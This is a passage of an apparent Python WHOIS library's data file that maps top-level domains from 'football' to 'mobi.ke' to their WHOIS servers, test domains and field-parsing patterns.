\"whois.nic.google\"}\nZZ[\"football\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"forex\"] = {\"_server\": \"whois.nic.forex\", \"extend\": \"com\", \"_test\": \"nic.forex\"}\nZZ[\"forsale\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"forum\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"foundation\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.nic.foundation\", \"_test\": \"nic.foundation\"}\nZZ[\"fox\"] = {\"_server\": \"whois.nic.fox\", \"extend\": \"com\", \"_test\": \"nic.fox\"}\nZZ[\"free\"] = {\"_server\": \"whois.nic.free\", \"extend\": \"com\", \"_test\": \"nic.free\"}\nZZ[\"fresenius\"] = {\"_server\": \"whois.nic.fresenius\", \"extend\": \"com\", \"_test\": \"nic.fresenius\"}\nZZ[\"frl\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"frogans\"] = {\"_server\": \"whois.nic.frogans\", \"extend\": \"com\", \"_test\": \"nic.frogans\"}\nZZ[\"frontdoor\"] = {\"_server\": \"whois.nic.frontdoor\", \"extend\": \"com\", \"_test\": \"nic.frontdoor\"}\nZZ[\"fujitsu\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"fund\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fun\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"furniture\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"futbol\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fyi\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ga\"] = {\"extend\": \"_privateReg\"}\nZZ[\"gallery\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gallo\"] = {\"_server\": \"whois.nic.gallo\", \"extend\": \"com\", \"_test\": \"nic.gallo\"}\nZZ[\"gallup\"] = {\"_server\": \"whois.nic.gallup\", \"extend\": \"com\", \"_test\": \"nic.gallup\"}\nZZ[\"gal\"] = {\"_server\": \"whois.nic.gal\", \"extend\": \"com\", \"_test\": \"nic.gal\"}\nZZ[\"game\"] = {\"extend\": \"amsterdam\"}\nZZ[\"games\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"garden\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.garden\", \"_test\": \"nic.garden\"}\nZZ[\"gay\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.gay\", \"_test\": \"nic.gay\"}\nZZ[\"gbiz\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"gd\"] = {\"extend\": \"com\"}\nZZ[\"gdn\"] = {\"_server\": \"whois.nic.gdn\", \"extend\": \"com\", \"_test\": \"nic.gdn\"}\nZZ[\"gea\"] = {\"_server\": \"whois.nic.gea\", \"extend\": \"com\", \"_test\": \"nic.gea\"}\nZZ[\"gent\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"genting\"] = {\"_server\": \"whois.nic.genting\", \"extend\": \"com\", \"_test\": \"nic.genting\"}\nZZ[\"geo.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"george\"] = {\"_server\": \"whois.nic.george\", \"extend\": \"com\", \"_test\": \"nic.george\"}\nZZ[\"ge\"] = {\"_server\": \"whois.nic.ge\", \"extend\": \"ac\", \"updated_date\": None, \"_test\": \"nic.ge\", \"registrant\": R(r\"Registrant:\\s*([^\\n]*)\\n\")}\nZZ[\"gf\"] = {\"extend\": \"si\", \"_server\": \"whois.mediaserv.net\"}\nZZ[\"ggee\"] = {\"_server\": \"whois.nic.ggee\", \"extend\": \"com\", \"_test\": \"nic.ggee\"}\nZZ[\"gh\"] = {\"_privateRegistry\": True}\nZZ[\"gift\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"gifts\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gi\"] = {\"_server\": \"whois2.afilias-grs.net\", \"extend\": \"com\"}\nZZ[\"gives\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"giving\"] = {\"_server\": \"whois.nic.giving\", \"extend\": \"com\", \"_test\": \"nic.giving\"}\nZZ[\"glass\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gle\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"global\"] = {\"extend\": \"amsterdam\", \"name_servers\": R(r\"Name Server: (.+)\")}\nZZ[\"globo\"] = {\"_server\": \"whois.gtlds.nic.br\", \"extend\": \"bom\"}\nZZ[\"gl\"] = {\"_server\": \"whois.nic.gl\", \"extend\": \"com\", \"_test\": \"nic.gl\"}\nZZ[\"gmail\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"gmbh\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gmo\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\", \"_test\": \"nic.gmo\"}\nZZ[\"gmx\"] = {\"_server\": \"whois.nic.gmx\", \"extend\": \"com\", \"_test\": \"nic.gmx\"}\nZZ[\"gob.ec\"] = {\"extend\": \"ec\"}\nZZ[\"godaddy\"] = {\"_server\": \"whois.nic.godaddy\", \"extend\": \"com\", \"_test\": \"nic.godaddy\"}\nZZ[\"go.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"go.ke\"] = {\"extend\": \"ke\"}\nZZ[\"gold\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"goldpoint\"] = {\"_server\": \"whois.nic.goldpoint\", \"extend\": \"com\", \"_test\": \"nic.goldpoint\"}\nZZ[\"golf\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"goodyear\"] = {\"_server\": \"whois.nic.goodyear\", \"extend\": \"com\", \"_test\": \"nic.goodyear\"}\nZZ[\"google\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\", \"_test\": \"nic.google\"}\nZZ[\"goog\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"goo\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"gop\"] = {\"_server\": \"whois.nic.gop\", \"extend\": \"com\", \"_test\": \"nic.gop\"}\nZZ[\"go.th\"] = {\"extend\": \"co.th\"}\nZZ[\"got\"] = {\"_server\": \"whois.nic.got\", \"extend\": \"com\", \"_test\": \"nic.got\"}\nZZ[\"gov.bd\"] = {\"extend\": \"bd\"}\nZZ[\"gov\"] = {\"extend\": \"com\"}\nZZ[\"gov.rw\"] = {\"extend\": \"rw\"}\nZZ[\"gov.tr\"] = {\"extend\": \"com.tr\", \"_server\": \"whois.trabis.gov.tr\", \"_test\": \"www.turkiye.gov.tr\"}\nZZ[\"gov.uk\"] = {\"extend\": \"ac.uk\"}\nZZ[\"gq\"] = {\"extend\": \"ml\", \"_server\": \"whois.domino.gq\"}\nZZ[\"graphics\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gratis\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"green\"] = {\"extend\": \"com\"}\nZZ[\"gr\"] = {\"extend\": \"_privateReg\"}\nZZ[\"gripe\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gr.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"group\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gs\"] = {\"_server\": \"whois.nic.gs\", \"extend\": \"com\", \"_test\": \"nic.gs\"}\nZZ[\"gt\"] = {\"extend\": \"_privateReg\"}\nZZ[\"gucci\"] = {\"_server\": \"whois.nic.gucci\", \"extend\": \"com\", \"_test\": \"nic.gucci\"}\nZZ[\"guge\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"guide\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"guitars\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"guru\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"gy\"] = {\"extend\": \"com\"}\nZZ[\"hair\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"hamburg\"] = {\"_server\": \"whois.nic.hamburg\", \"extend\": \"com\", \"_test\": \"nic.hamburg\"}\nZZ[\"hangout\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"haus\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"hdfcbank\"] = {\"_server\": \"whois.nic.hdfcbank\", \"extend\": \"com\", \"_test\": \"nic.hdfcbank\"}\nZZ[\"hdfc\"] = {\"_server\": \"whois.nic.hdfc\", \"extend\": \"com\", \"_test\": \"nic.hdfc\"}\nZZ[\"healthcare\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"health\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.health\", \"_test\": \"nic.health\"}\nZZ[\"help\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"helsinki\"] = {\"_server\": \"whois.nic.helsinki\", \"extend\": \"com\", \"_test\": \"nic.helsinki\"}\nZZ[\"here\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"hermes\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"hiphop\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.hiphop\", \"_test\": \"nic.hiphop\"}\nZZ[\"hisamitsu\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"hitachi\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"hiv\"] = {\"_server\": \"whois.nic.hiv\", \"extend\": \"com\", \"_test\": \"nic.hiv\"}\nZZ[\"hkt\"] = {\"_server\": \"whois.nic.hkt\", \"extend\": \"com\", \"_test\": \"nic.hkt\"}\nZZ[\"hn\"] = {\"extend\": \"com\"} # Honduras\nZZ[\"hockey\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"holdings\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"holiday\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"homedepot\"] = {\"_server\": \"whois.nic.homedepot\", \"extend\": \"com\", \"_test\": \"nic.homedepot\"}\nZZ[\"homes\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"honda\"] = {\"_server\": \"whois.nic.honda\", \"extend\": \"com\", \"_test\": \"nic.honda\"}\nZZ[\"hopto.org\"] = {\"extend\": \"_privateReg\"} # dynamic dns without any whois\nZZ[\"horse\"] = {\"_server\": \"whois.nic.horse\", \"extend\": \"com\", \"_test\": \"nic.horse\"}\nZZ[\"hospital\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"host\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"hosting\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"hot\"] = {\"_server\": \"whois.nic.hot\", \"extend\": \"com\", \"_test\": \"nic.hot\"}\nZZ[\"house\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"how\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"ht\"] = {\"_server\": \"whois.nic.ht\", \"extend\": \"com\", \"_test\": \"nic.ht\"}\nZZ[\"hu\"] = {\"extend\": \"_privateReg\"}\nZZ[\"hughes\"] = {\"_server\": \"whois.nic.hughes\", \"extend\": \"com\", \"_test\": \"nic.hughes\"}\nZZ[\"hyundai\"] = {\"_server\": \"whois.nic.hyundai\", \"extend\": \"com\", \"_test\": \"nic.hyundai\"}\nZZ[\"ibm\"] = {\"_server\": \"whois.nic.ibm\", \"extend\": \"com\", \"_test\": \"nic.ibm\"}\nZZ[\"icbc\"] = {\"_server\": \"whois.nic.icbc\", \"extend\": \"com\", \"_test\": \"nic.icbc\"}\nZZ[\"ice\"] = {\"_server\": \"whois.nic.ice\", \"extend\": \"com\", \"_test\": \"nic.ice\"}\nZZ[\"icu\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"ie\"] = {\"extend\": \"com\"} # Ireland\nZZ[\"ifm\"] = {\"_server\": \"whois.nic.ifm\", \"extend\": \"com\", \"_test\": \"nic.ifm\"}\nZZ[\"ikano\"] = {\"_server\": \"whois.nic.ikano\", \"extend\": \"com\", \"_test\": \"nic.ikano\"}\nZZ[\"imamat\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"imdb\"] = {\"_server\": \"whois.nic.imdb\", \"extend\": \"com\", \"_test\": \"nic.imdb\"}\nZZ[\"immobilien\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"immo\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"inc\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"industries\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"in\"] = {\"extend\": \"com\", \"_server\": \"whois.registry.in\"}\nZZ[\"infiniti\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"info\"] = {\"extend\": \"com\"}\nZZ[\"info.ke\"] = {\"extend\": \"ke\"}\nZZ[\"info.ve\"] = {\"extend\": \"ve\"}\nZZ[\"ing\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"ink\"] = {\"extend\": \"amsterdam\"}\nZZ[\"institute\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"insurance\"] = {\"_server\": \"whois.nic.insurance\", \"extend\": \"com\", \"_test\": \"nic.insurance\"}\nZZ[\"insure\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"international\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"in.th\"] = {\"extend\": \"co.th\"}\nZZ[\"investments\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"io\"] = {\"extend\": \"com\", \"expiration_date\": R(r\"\\nRegistry Expiry Date:\\s?(.+)\")}\nZZ[\"irish\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ismaili\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"istanbul\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ist\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"itv\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"jaguar\"] = {\"_server\": \"whois.nic.jaguar\", \"extend\": \"com\", \"_test\": \"nic.jaguar\"}\nZZ[\"java\"] = {\"_server\": \"whois.nic.java\", \"extend\": \"com\", \"_test\": \"nic.java\"}\nZZ[\"jcb\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"jeep\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"je\"] = {\"extend\": \"gg\"}\nZZ[\"jetzt\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"jewelry\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"jio\"] = {\"_server\": \"whois.nic.jio\", \"extend\": \"com\", \"_test\": \"nic.jio\"}\nZZ[\"jll\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"jobs\"] = {\"_server\": \"whois.nic.jobs\", \"extend\": \"com\", \"_test\": \"nic.jobs\"}\nZZ[\"joburg\"] = {\"_server\": \"whois.nic.joburg\", \"extend\": \"com\", \"_test\": \"nic.joburg\"}\nZZ[\"jot\"] = {\"_server\": \"whois.nic.jot\", \"extend\": \"com\", \"_test\": \"nic.jot\"}\nZZ[\"joy\"] = {\"_server\": \"whois.nic.joy\", \"extend\": \"com\", \"_test\": \"nic.joy\"}\nZZ[\"juegos\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"juniper\"] = {\"_server\": \"whois.nic.juniper\", \"extend\": \"com\", \"_test\": \"nic.juniper\"}\nZZ[\"kaufen\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"kddi\"] = {\"_server\": \"whois.nic.kddi\", \"extend\": \"com\", \"_test\": \"nic.kddi\"}\nZZ[\"ke\"] = {\"extend\": \"com\", \"_server\": \"whois.kenic.or.ke\"}\nZZ[\"kerryhotels\"] = {\"_server\": \"whois.nic.kerryhotels\", \"extend\": \"com\", \"_test\": \"nic.kerryhotels\"}\nZZ[\"kerrylogistics\"] = {\"_server\": \"whois.nic.kerrylogistics\", \"extend\": \"com\", \"_test\": \"nic.kerrylogistics\"}\nZZ[\"kerryproperties\"] = {\"_server\": \"whois.nic.kerryproperties\", \"extend\": \"com\", \"_test\": \"nic.kerryproperties\"}\nZZ[\"kfh\"] = {\"_server\": \"whois.nic.kfh\", \"extend\": \"com\", \"_test\": \"nic.kfh\"}\nZZ[\"kia\"] = {\"_server\": \"whois.nic.kia\", \"extend\": \"com\", \"_test\": \"nic.kia\"}\nZZ[\"kids\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ki\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.ki\", \"_test\": None} # kiribati never answeres, timout is the normal response\nZZ[\"kim\"] = {\"_server\": \"whois.nic.kim\", \"extend\": \"com\", \"_test\": \"nic.kim\"}\nZZ[\"kindle\"] = {\"_server\": \"whois.nic.kindle\", \"extend\": \"com\", \"_test\": \"nic.kindle\"}\nZZ[\"kitchen\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"kiwi\"] = {\"extend\": \"com\"}\nZZ[\"kn\"] = {\"extend\": \"com\"} # Saint Kitts and Nevis\nZZ[\"koeln\"] = {\"_server\": \"whois.ryce-rsp.com\", \"extend\": \"com\"}\nZZ[\"komatsu\"] = {\"_server\": \"whois.nic.komatsu\", \"extend\": \"com\", \"_test\": \"nic.komatsu\"}\nZZ[\"kosher\"] = {\"_server\": \"whois.nic.kosher\", \"extend\": \"com\", \"_test\": \"nic.kosher\"}\nZZ[\"krd\"] = {\"_server\": \"whois.nic.krd\", \"extend\": \"com\", \"_test\": \"nic.krd\"}\nZZ[\"kred\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"kuokgroup\"] = {\"_server\": \"whois.nic.kuokgroup\", \"extend\": \"com\", \"_test\": \"nic.kuokgroup\"}\nZZ[\"kyoto\"] = {\"_server\": \"whois.nic.kyoto\", \"extend\": \"com\", \"_test\": \"nic.kyoto\"}\nZZ[\"ky\"] = {\"_server\": \"whois.kyregistry.ky\", \"extend\": \"com\"}\nZZ[\"lacaixa\"] = {\"_server\": \"whois.nic.lacaixa\", \"extend\": \"com\", \"_test\": \"nic.lacaixa\"}\nZZ[\"la\"] = {\"extend\": \"com\"}\nZZ[\"lamborghini\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"lamer\"] = {\"_server\": \"whois.nic.lamer\", \"extend\": \"com\", \"_test\": \"nic.lamer\"}\nZZ[\"lancaster\"] = {\"_server\": \"whois.nic.lancaster\", \"extend\": \"com\", \"_test\": \"nic.lancaster\"}\nZZ[\"land\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"landrover\"] = {\"_server\": \"whois.nic.landrover\", \"extend\": \"com\", \"_test\": \"nic.landrover\"}\nZZ[\"lasalle\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"lat\"] = {\"extend\": \"com\"}\nZZ[\"latino\"] = {\"_server\": \"whois.nic.latino\", \"extend\": \"com\", \"_test\": \"nic.latino\"}\nZZ[\"latrobe\"] = {\"_server\": \"whois.nic.latrobe\", \"extend\": \"com\", \"_test\": \"nic.latrobe\"}\nZZ[\"law\"] = {\"_server\": \"whois.nic.law\", \"extend\": \"com\", \"_test\": \"nic.law\"}\nZZ[\"lawyer\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"lb\"] = {\"_server\": \"whois.lbdr.org.lb\", \"extend\": \"com\"}\nZZ[\"lc\"] = {\"extend\": \"com\", \"_server\": \"whois2.afilias-grs.net\"}\nZZ[\"lds\"] = {\"_server\": \"whois.nic.lds\", \"extend\": \"com\", \"_test\": \"nic.lds\"}\nZZ[\"lease\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"leclerc\"] = {\"_server\": \"whois.nic.leclerc\", \"extend\": \"com\", \"_test\": \"nic.leclerc\"}\nZZ[\"lefrak\"] = {\"_server\": \"whois.nic.lefrak\", \"extend\": \"com\", \"_test\": \"nic.lefrak\"}\nZZ[\"legal\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"lego\"] = {\"_server\": \"whois.nic.lego\", \"extend\": \"com\", \"_test\": \"nic.lego\"}\nZZ[\"lexus\"] = {\"_server\": \"whois.nic.lexus\", \"extend\": \"com\", \"_test\": \"nic.lexus\"}\nZZ[\"lgbt\"] = {\"_server\": \"whois.nic.lgbt\", \"extend\": \"com\", \"_test\": \"nic.lgbt\"}\nZZ[\"lg.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"lidl\"] = {\"_server\": \"whois.nic.lidl\", \"extend\": \"com\", \"_test\": \"nic.lidl\"}\nZZ[\"li\"] = {\"extend\": \"_privateReg\"}\nZZ[\"life\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"lifestyle\"] = {\"_server\": \"whois.nic.lifestyle\", \"extend\": \"com\", \"_test\": \"nic.lifestyle\"}\nZZ[\"lighting\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"like\"] = {\"_server\": \"whois.nic.like\", \"extend\": \"com\", \"_test\": \"nic.like\"}\nZZ[\"limited\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"limo\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"link\"] = {\"extend\": \"amsterdam\"}\nZZ[\"lipsy\"] = {\"_server\": \"whois.nic.lipsy\", \"extend\": \"com\", \"_test\": \"nic.lipsy\"}\nZZ[\"live\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"lk\"] = {\"extend\": \"_privateReg\"} # Sri Lanka\nZZ[\"llc\"] = {\"_server\": \"whois.nic.llc\", \"extend\": \"com\", \"_test\": \"nic.llc\"}\nZZ[\"llp\"] = {\"_server\": \"whois.nic.llp\", \"extend\": \"com\", \"_test\": \"nic.llp\"}\nZZ[\"loan\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.loan\", \"_test\": \"nic.loan\"}\nZZ[\"loans\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"locker\"] = {\"_server\": \"whois.nic.locker\", \"extend\": \"com\", \"_test\": \"nic.locker\"}\nZZ[\"locus\"] = {\"_server\": \"whois.nic.locus\", \"extend\": \"com\", \"_test\": \"nic.locus\"}\nZZ[\"lol\"] = {\"extend\": \"amsterdam\"}\nZZ[\"london\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"lotte\"] = {\"_server\": \"whois.nic.lotte\", \"extend\": \"com\", \"_test\": \"nic.lotte\"}\nZZ[\"lotto\"] = {\"_server\": \"whois.nic.lotto\", \"extend\": \"com\", \"_test\": \"nic.lotto\"}\nZZ[\"love\"] = {\"extend\": \"ac\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\")}\nZZ[\"lplfinancial\"] = {\"_server\": \"whois.nic.lplfinancial\", \"extend\": \"com\", \"_test\": \"nic.lplfinancial\"}\nZZ[\"lpl\"] = {\"_server\": \"whois.nic.lpl\", \"extend\": \"com\", \"_test\": \"nic.lpl\"}\nZZ[\"ls\"] = {\"extend\": \"cz\", \"_server\": \"whois.nic.ls\", \"_test\": \"nic.ls\"}\nZZ[\"ltda\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ltd\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"lundbeck\"] = {\"_server\": \"whois.nic.lundbeck\", \"extend\": \"com\", \"_test\": \"nic.lundbeck\"}\nZZ[\"luxe\"] = {\"_server\": \"whois.nic.luxe\", \"extend\": \"com\", \"_test\": \"nic.luxe\"}\nZZ[\"luxury\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"lviv.ua\"] = {\"extend\": \"com\"}\nZZ[\"ly\"] = {\"extend\": \"ac\", \"_server\": \"whois.nic.ly\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\"), \"_test\": \"nic.ly\"}\nZZ[\"madrid\"] = {\"_server\": \"whois.nic.madrid\", \"extend\": \"com\", \"_test\": \"nic.madrid\"}\nZZ[\"ma\"] = {\"extend\": \"ac\", \"_server\": \"whois.registre.ma\", \"registrar\": R(r\"Sponsoring Registrar:\\s*(.+)\")}\nZZ[\"maison\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"makeup\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"management\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"mango\"] = {\"_server\": \"whois.nic.mango\", \"extend\": \"com\", \"_test\": \"nic.mango\"}\nZZ[\"man\"] = {\"_server\": \"whois.nic.man\", \"extend\": \"com\", \"_test\": \"nic.man\"}\nZZ[\"map\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"market\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"marketing\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"markets\"] = {\"_server\": \"whois.nic.markets\", \"extend\": \"com\", \"_test\": \"nic.markets\"}\nZZ[\"marriott\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"mba\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"mckinsey\"] = {\"_server\": \"whois.nic.mckinsey\", \"extend\": \"com\", \"_test\": \"nic.mckinsey\"}\nZZ[\"media\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"med\"] = {\"_server\": \"whois.nic.med\", \"extend\": \"com\", \"_test\": \"nic.med\"}\nZZ[\"meet\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"me.ke\"] = {\"extend\": \"ke\"}\nZZ[\"melbourne\"] = {\"_server\": \"whois.nic.melbourne\", \"extend\": \"com\", \"_test\": \"nic.melbourne\"}\nZZ[\"meme\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"memorial\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"men\"] = {\"_server\": \"whois.nic.men\", \"extend\": \"com\", \"_test\": \"nic.men\"}\nZZ[\"menu\"] = {\"_server\": \"whois.nic.menu\", \"extend\": \"com\", \"_test\": \"nic.menu\"}\nZZ[\"mg\"] = {\"extend\": \"ac\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\")}\nZZ[\"miami\"] = {\"_server\": \"whois.nic.miami\", \"extend\": \"com\", \"_test\": \"nic.miami\"}\nZZ[\"mil.rw\"] = {\"extend\": \"rw\"}\nZZ[\"mini\"] = {\"_server\": \"whois.nic.mini\", \"extend\": \"com\", \"_test\": \"nic.mini\"}\nZZ[\"mit\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"mitsubishi\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"mls\"] = {\"_server\": \"whois.nic.mls\", \"extend\": \"com\", \"_test\": \"nic.mls\"}\nZZ[\"mma\"] = {\"_server\": \"whois.nic.mma\", \"extend\": \"com\", \"_test\": \"nic.mma\"}\nZZ[\"mn\"] = {\"extend\": \"com\"}\nZZ[\"mn\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.mn\", \"_test\": \"nic.mn\"}\nZZ[\"mobi\"] = {\"extend\": \"com\", \"expiration_date\": R(r\"\\nRegistry Expiry Date:\\s?(.+)\"), \"updated_date\": R(r\"\\nUpdated Date:\\s?(.+)\")}\nZZ[\"mobi.ke\"] = {\"extend\": 